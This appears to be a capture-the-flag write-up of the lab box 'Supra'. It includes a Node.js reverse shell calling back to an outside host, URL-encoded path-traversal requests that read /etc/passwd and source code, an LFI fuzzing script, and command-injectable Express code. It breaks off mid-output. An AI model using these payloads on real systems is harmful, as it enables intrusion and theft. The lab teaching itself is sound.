{"id":777,"date":"2024-08-09T15:38:56","date_gmt":"2024-08-09T07:38:56","guid":{"rendered":"http:\/\/162.14.82.114\/?p=777"},"modified":"2024-08-09T15:38:56","modified_gmt":"2024-08-09T07:38:56","slug":"hmv-_-supra","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/777\/08\/09\/2024\/","title":{"rendered":"hmv[-_-]Supra"},"content":{"rendered":"<h1>Supra<\/h1>\n
<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\nOpen 192.168.10.103:4000\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   3072 d9:75:70:c0:72:4c:4b:df:66:54:15:e7:77:37:44:18 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3M700tkvIKlRU2W80ESj8iG6n1aHoOBcpf1Sg17U8kZe6AgY72CF7B1vmRvAnVJaYfMIOIO+qFLtGky\/+iKy48zcGOv3woQGoJaQBN0RsUrS2VR5lTYXR0iQKGF0AyexRIaBvWfMkMSmr5KOFTA5PXg9Q2GeyKWxnewsAm+7zgwGa0oE4J+qjikfWuqmKZOgOBzuBdK+fd2TQNcnglZhYfP3PPEMZY1ePxhCN\/wWecBBbjTXc67Tf5qADKsDliU9wdxp+Yv4u\/qe9cAcYlHdgC1MTGXN75Pn+IzWleUzqZS6CAGq2LHLxGx9J9W5VoHDns9enY9H19xINhYp312OvMQo9osaWqoR2w88fdpjAR6N\/7p2sPXvYG7sVfCb68T1Pjxsg\/9Nuy9QvfeWYqaIIt7Ry32Tt0Q0WTzegQpGRK8HsS4fGf7S2GDUs3FSfg\/PSCnIMZNqOM7BivwDOSxh14Elyy6AJXViYuycZO8QnOHAOMI5uWzbZ++ALlmdxMQs=\n|   256 3d:47:46:10:4a:5a:ee:b9:5f:94:61:bd:08:ff:7d:bb (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK\/Sg1X3XisZwfkGdPEeBo+ObY7+QIGdPk4m2cweF+myUy87mVPaD56mIFz3pFozfxvZKCNH1LjMsGFH1lXQAso=\n|   256 be:bc:64:9a:c4:45:32:83:ed:6c:50:c2:2a:a1:a9:a4 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK0pzA44OqYBOt9Nk26VpZXfZrbRtmjgUiulqFY8N\/YS\n80\/tcp   open  http    syn-ack Apache httpd 2.4.48 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.48 (Debian)\n4000\/tcp open  http    syn-ack Node.js (Express middleware)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: NullTrace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 
301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.103\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 10701]\nProgress: 9776 \/ 882244 (1.11%)[ERROR] Get &quot;http:\/\/192.168.10.103\/works.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/body.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 83338 \/ 882244 (9.45%)\nProgress: 130744 \/ 882244 (14.82%)\nProgress: 175649 \/ 882244 (19.91%)\nProgress: 252871 \/ 882244 (28.66%)[ERROR] Get &quot;http:\/\/192.168.10.103\/caepipe.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 379668 \/ 882244 (43.03%)[ERROR] Get &quot;http:\/\/192.168.10.103\/51118853.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/Sell_Mat.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/51118853.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/Sell_Mat&quot;: context deadline exceeded (Client.Timeout exceeded 
while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/Sell_Mat.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 412103 \/ 882244 (46.71%)[ERROR] Get &quot;http:\/\/192.168.10.103\/90368.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/coolhand&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/coolhand.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 464470 \/ 882244 (52.65%)[ERROR] Get &quot;http:\/\/192.168.10.103\/95843&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/163958.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/105473&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/95843.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/95843.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 487735 \/ 882244 (55.28%)[ERROR] Get &quot;http:\/\/192.168.10.103\/51396.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 489683 \/ 882244 (55.50%)[ERROR] Get &quot;http:\/\/192.168.10.103\/81758.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/38348.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/42761&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/42761.html&quot;: context 
deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/51397&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.10.103\/38348.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 493426 \/ 882244 (55.93%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 493493 \/ 882244 (55.94%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Nothing turns up from the scan, so forget it.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text                        \n\n[Debian Logo]  Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\nIf you are a normal user of this web site and don&#039;t know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. 
If the problem persists, please contact the site&#039;s administrator.\nConfiguration Overview<\/code><\/pre>\n<p>It is just the Apache default page.<\/p>\n<h3>Sensitive Port<\/h3>\n<p>Now to see how port <code>4000<\/code> can be tested:<\/p>\n<p>Looking at the page source, I found:<\/p>\n<pre><code class=\"language-html\"> &lt;script&gt;\n        
function ping() {\n            ip = document.getElementById(&quot;pingIn&quot;).value;\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/ping\/&quot; + ip, false);\n            xhttp.send();\n            document.getElementById(&quot;pingResult&quot;).innerHTML = xhttp.responseText;\n        }\n\n        function portscan() {\n            ip = document.getElementById(&quot;portscanIn&quot;).value;\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/portscan\/&quot; + ip, false);\n            xhttp.send();\n            document.getElementById(&quot;portscanResult&quot;).innerHTML = xhttp.responseText;\n        }\n\n        function whois() {\n            ip = document.getElementById(&quot;whoisIn&quot;).value;\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/whois\/&quot; + ip, false);\n            xhttp.send();\n            document.getElementById(&quot;whoisResult&quot;).innerHTML = xhttp.responseText;\n        }\n\n        function base64e() {\n            data = document.getElementById(&quot;base64eIn&quot;).value;\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/base64\/encode\/&quot; + data, false);\n            xhttp.send();\n            document.getElementById(&quot;base64eResult&quot;).innerHTML = xhttp.responseText;\n        }\n\n        function base64d() {\n            data = document.getElementById(&quot;base64dIn&quot;).value;\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/base64\/decode\/&quot; + data, false);\n            xhttp.send();\n            document.getElementById(&quot;base64dResult&quot;).innerHTML = xhttp.responseText;\n        }\n\n        function passgen() {\n\n            var xhttp = new XMLHttpRequest();\n            xhttp.open(&quot;GET&quot;, &quot;\/generate-password&quot;, false);\n            
xhttp.send();\n            document.getElementById(&quot;passgenResult&quot;).innerHTML = xhttp.responseText;\n        }\n    &lt;\/script&gt;<\/code><\/pre>\n<p>Found a file upload endpoint. Before trying to upload a reverse shell file, test it with a plain file first:<\/p>\n<p>Access the uploaded file:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/var\/www\/api\/uploads\/test.txt | html2text\nCannot GET \/var\/www\/api\/uploads\/test.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/uploads\/test.txt | html2text \njust a test......<\/code><\/pre>\n<p>Since this site is built with <code>nodejs<\/code>, I tried uploading a matching reverse shell, but found that it was not executed (the file is only served back as text):<\/p>\n<pre><code class=\"language-javascript\">(function(){\n    var net = require(&quot;net&quot;),\n        cp = require(&quot;child_process&quot;),\n        sh = cp.spawn(&quot;bash&quot;, []);\n    var client = new net.Socket();\n    client.connect(1234, 
&quot;192.168.10.104&quot;, function(){\n        client.pipe(sh.stdin);\n        sh.stdout.pipe(client);\n        sh.stderr.pipe(client);\n    });\n    return \/a\/; \/\/ Prevents the Node.js application from crashing\n})();<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>Try file inclusion (a plain <code>..\/<\/code> traversal is normalised away by the router, but a URL-encoded one is not):<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP:4000\/uploads\/..\/..\/..\/..\/etc\/passwd&quot; | html2text                       \nCannot GET \/etc\/passwd\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP:4000\/uploads\/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd&quot;            \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network 
Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n<p>Try reading other files, this time fully URL-encoding the path:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ echo -n &quot;..\/..\/..\/..\/..\/etc\/passwd&quot; | xxd -p | tr -d &#039;\\n&#039; | sed &#039;s\/\\(..\\)\/%\\1\/g&#039;\n%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&quot; \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 
(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n<p>I thought of writing a script to run through an LFI wordlist:<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n# Read each candidate path from the wordlist, URL-encode it byte by byte,\n# and append the server response to result.txt.\nwhile IFS= read -r line; do\n    urlcode=$(echo -n &quot;$line&quot; | xxd -p | tr -d &#039;\\n&#039; | sed &#039;s\/\\(..\\)\/%\\1\/g&#039;)\n    echo &quot;[+] payload:$line&quot; &gt;&gt; result.txt\n    echo &quot;[+] url_payload:$urlcode&quot; &gt;&gt; result.txt\n    curl -s &quot;http:\/\/192.168.10.103:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f$urlcode&quot; &gt;&gt; result.txt\ndone &lt; \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt<\/code><\/pre>\n<p>Well, I cannot say it was useless, only that none of it was of any use...<\/p>\n<p>Recalling the directory path revealed by the upload response earlier, let's look through <code>app.js<\/code>:<\/p>\n<pre><code class=\"language-bash\"># \/var\/www\/api\/uploads\/test.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.103:4000\/uploads\/..%2Fapp.js&quot;\nvar express = require(&#039;express&#039;);\nconst { exec } = 
require(&#039;child_process&#039;)\nconst { base64encode, base64decode } = require(&#039;nodejs-base64&#039;);\nconst whois = require(&#039;node-xwhois&#039;);\nconst ipRegex = require(&#039;ip-regex&#039;);\nvar generator = require(&#039;generate-password&#039;);\nconst fs = require(&#039;fs&#039;)\nvar multer = require(&#039;multer&#039;);\n\nvar storage = multer.diskStorage({\n    destination: function (req, file, callback) {\n        callback(null, &#039;.\/uploads&#039;);\n    },\n    filename: function (req, file, callback) {\n        callback(null, file.originalname);\n    }\n});\n\nvar upload = multer({ storage: storage }).single(&#039;userFile&#039;);\nvar app = express();\napp.set(&#039;view engine&#039;, &#039;ejs&#039;);\n\napp.get(&#039;\/&#039;, (req, res) =&gt; {\n\n    res.render(&#039;home&#039;);\n\n});\n\napp.get(&#039;\/ping\/:ip&#039;, (req, res) =&gt; {\n\n    ip = req.params.ip\n    if (ipRegex({ exact: true }).test(ip)) {\n\n        exec(&quot;ping -c 3 &quot;.concat(ip), (error, stdout, stderr) =&gt; {\n            if (error) {\n\n            }\n            if (stderr) {\n\n            }\n            console.log(`stdout: ${stdout}`);\n            res.send(`stdout: ${stdout}`)\n        });\n    }\n    else {\n        res.send(&quot;This is not an IP&quot;);\n    }\n\n});\n\napp.get(&#039;\/portscan\/:ip&#039;, (req, res) =&gt; {\n\n    ip = req.params.ip\n\n    if (ipRegex({ exact: true }).test(ip)) {\n\n        exec(&quot;nmap -p 21,22,443,80,8080 -T4 &quot;.concat(ip), (error, stdout, stderr) =&gt; {\n            if (error) {\n\n            }\n            if (stderr) {\n\n            }\n            console.log(`stdout: ${stdout}`);\n            res.send(`stdout: ${stdout}`)\n        });\n    }\n    else {\n        res.send(&quot;This is not an IP&quot;);\n    }\n\n});\n\napp.get(&#039;\/whois\/:ip&#039;, (req, res) =&gt; {\n\n    ip = req.params.ip\n\n    if (ipRegex({ exact: true }).test(ip)) {\n\n        whois.whois(ip)\n            
.then(data =&gt; res.send(data))\n            .catch(err =&gt; console.log(err));\n    }\n    else {\n        res.send(&quot;This is not an IP&quot;);\n    }\n\n});\n\napp.get(&#039;\/base64\/decode\/:data&#039;, (req, res) =&gt; {\n\n    data = req.params.data\n    base64decoded = base64decode(data)\n    res.send(base64decoded)\n});\n\napp.get(&#039;\/base64\/encode\/:data&#039;, (req, res) =&gt; {\n\n    data = req.params.data\n    base64encoded = base64encode(data)\n    res.send(base64encoded)\n});\n\napp.get(&#039;\/generate-password&#039;, (req, res) =&gt; {\n\n    var password = generator.generate({\n        length: 18,\n        numbers: true,\n        symbols: true\n    });\n\n    res.send(password)\n});\n\napp.get(&#039;\/uploads\/:filename&#039;, (req, res) =&gt; {\n\n    finalPath = __dirname.concat(&quot;\/uploads\/&quot;).concat(req.params.filename)\n    console.log(finalPath)\n    fs.readFile(finalPath, &#039;utf8&#039;, (err, data) =&gt; {\n        res.end(data);\n    })\n});\n\napp.post(&#039;\/file&#039;, function (req, res) {\n    upload(req, res, function (err) {\n\n        if (req.fileValidationError) {\n            return res.send(req.fileValidationError);\n        }\n        else if (!req.file) {\n            return res.send(&#039;Please select a file to upload&#039;);\n        }\n        else if (err instanceof multer.MulterError) {\n            return res.send(err);\n        }\n        else if (err) {\n            return res.send(err);\n        }\n\n        exec(&quot;md5sum &quot;.concat(__dirname).concat(&quot;\/uploads\/&quot;).concat(req.file.filename), (error, stdout, stderr) =&gt; {\n            console.log(`stdout: ${stdout}`);\n            res.end(`stdout: ${stdout}`)\n        });\n    });\n});\n\napp.get(&#039;\/internal-processes-v1-display&#039;, function (req, res) {\n\n    uid = req.query.uid\n    console.log(uid)\n    exec(&quot;ps aux | grep &quot;.concat(uid), (error, stdout, stderr) =&gt; {\n        console.log(`stdout: 
${stdout}`);\n        res.end(`stdout: ${stdout} :: ${uid}`)\n    });\n\n});\n\napp.listen(4000, function () {\n    console.log(&#039;listening to port 4000&#039;)\n});<\/code><\/pre>\n<p>There is a hidden API endpoint, <code>\/internal-processes-v1-display<\/code>, that concatenates the unvalidated <code>uid<\/code> query parameter straight into a shell command. Let's take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.103:4000\/internal-processes-v1-display&quot; \nstdout: www-data     795  0.0  0.0   2420   584 ?        S    02:14   0:00 \/bin\/sh -c ps aux | grep undefined\nwww-data     797  0.0  0.0   6180   712 ?        S    02:14   0:00 grep undefined\n :: undefined<\/code><\/pre>\n<p>Try using it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root&quot;\nstdout: root           1  0.2  0.4  98140 10088 ?        Ss   02:08   0:01 \/sbin\/init\nroot           2  0.0  0.0      0     0 ?        S    02:08   0:00 [kthreadd]\nroot           3  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [rcu_gp]\nroot           4  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [rcu_par_gp]\nroot           5  0.2  0.0      0     0 ?        I    02:08   0:01 [kworker\/0:0-events]\nroot           6  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kworker\/0:0H-events_highpri]\nroot           8  0.0  0.0      0     0 ?        I    02:08   0:00 [kworker\/u2:0-ext4-rsv-conversion]\nroot           9  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [mm_percpu_wq]\nroot          10  0.0  0.0      0     0 ?        S    02:08   0:00 [rcu_tasks_rude_]\nroot          11  0.0  0.0      0     0 ?        S    02:08   0:00 [rcu_tasks_trace]\nroot          12  0.0  0.0      0     0 ?        S    02:08   0:00 [ksoftirqd\/0]\nroot          13  0.0  0.0      0     0 ?        
I    02:08   0:00 [rcu_sched]\nroot          14  0.0  0.0      0     0 ?        S    02:08   0:00 [migration\/0]\nroot          15  0.0  0.0      0     0 ?        S    02:08   0:00 [cpuhp\/0]\nroot          17  0.0  0.0      0     0 ?        S    02:08   0:00 [kdevtmpfs]\nroot          18  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [netns]\nroot          19  0.0  0.0      0     0 ?        S    02:08   0:00 [kauditd]\nroot          20  0.0  0.0      0     0 ?        S    02:08   0:00 [khungtaskd]\nroot          21  0.0  0.0      0     0 ?        S    02:08   0:00 [oom_reaper]\nroot          22  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [writeback]\nroot          23  0.0  0.0      0     0 ?        S    02:08   0:00 [kcompactd0]\nroot          24  0.0  0.0      0     0 ?        SN   02:08   0:00 [ksmd]\nroot          25  0.0  0.0      0     0 ?        SN   02:08   0:00 [khugepaged]\nroot          43  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kintegrityd]\nroot          44  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kblockd]\nroot          45  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [blkcg_punt_bio]\nroot          46  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [edac-poller]\nroot          47  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [devfreq_wq]\nroot          48  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kworker\/0:1H-kblockd]\nroot          49  0.0  0.0      0     0 ?        S    02:08   0:00 [kswapd0]\nroot          50  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kthrotld]\nroot          51  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [acpi_thermal_pm]\nroot          52  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [ipv6_addrconf]\nroot          62  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [kstrp]\nroot          65  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [zswap-shrink]\nroot          66  0.0  0.0      0     0 ?        
I&lt;   02:08   0:00 [kworker\/u3:0]\nroot         109  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [ata_sff]\nroot         110  0.0  0.0      0     0 ?        S    02:08   0:00 [scsi_eh_0]\nroot         111  0.0  0.0      0     0 ?        S    02:08   0:00 [scsi_eh_1]\nroot         112  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [scsi_tmf_0]\nroot         113  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [scsi_tmf_1]\nroot         114  0.0  0.0      0     0 ?        S    02:08   0:00 [scsi_eh_2]\nroot         115  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [scsi_tmf_2]\nroot         116  0.0  0.0      0     0 ?        I    02:08   0:00 [kworker\/u2:2-flush-8:0]\nroot         118  0.0  0.0      0     0 ?        I    02:08   0:00 [kworker\/0:3-ata_sff]\nroot         152  0.0  0.0      0     0 ?        S    02:08   0:00 [jbd2\/sda1-8]\nroot         153  0.0  0.0      0     0 ?        I&lt;   02:08   0:00 [ext4-rsv-conver]\nroot         187  0.0  0.6  48224 12332 ?        Ss   02:09   0:00 \/lib\/systemd\/systemd-journald\nroot         214  0.0  0.2  22060  5700 ?        Ss   02:09   0:00 \/lib\/systemd\/systemd-udevd\nroot         283  0.0  0.0      0     0 ?        I&lt;   02:09   0:00 [cryptd]\nroot         284  0.0  0.0      0     0 ?        S    02:09   0:00 [irq\/18-vmwgfx]\nroot         285  0.0  0.0      0     0 ?        I&lt;   02:09   0:00 [ttm_swap]\nroot         286  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc0]\nroot         287  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc1]\nroot         288  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc2]\nroot         289  0.0  0.0      0     0 ?        S    02:09   0:00 [card0-crtc3]\nroot         290  0.0  